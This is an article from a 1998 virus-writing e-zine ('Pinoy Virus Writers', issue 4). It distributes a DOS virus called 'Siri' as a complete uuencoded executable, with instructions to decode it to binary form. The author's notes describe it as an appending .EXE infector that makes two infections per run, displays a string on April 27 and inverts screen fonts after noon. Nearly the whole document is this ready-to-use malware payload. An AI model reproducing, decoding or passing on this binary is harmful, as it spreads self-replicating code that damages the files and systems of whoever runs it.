  ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ [ Pinoy Virus Writers ] ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
                             Issue No. 4

 ษอออ   sOuRcEs !!!  ออออออออออออออออออออออออออออออออออออออออออป
 ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

 NAME : Siri
 AUTHOR : Zoom23
 NOTES : - Appending Run time .EXE infector Virus.
         - Activation of string April 27.
         - Inverts Screen fonts if time greater than 12 PM.
           Returns to Normal font if run again.
         - 2 infections per run.
         - Compiled with TP 7.0  , 4992 bytes long.

 Use UUdecode to covert to Binary form.

    ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ [  CUT HERE  ] ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
begin 644 siri.exe
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
M``````````````````````#__P``````````````````````````````````
J`````````````````````````!!```"@`+``N````@``````````````
`
end
    ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ [  CUT HERE  ] ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ

 (C) Zoom23  brianjan@mailcity.com
 Pinoy Virus Writers 1998
 http://sourceofkaos.com/homes/brianjan
 http://members.xoom.com/Zoom23

 EOF-------------------------------------------------------------------EOF
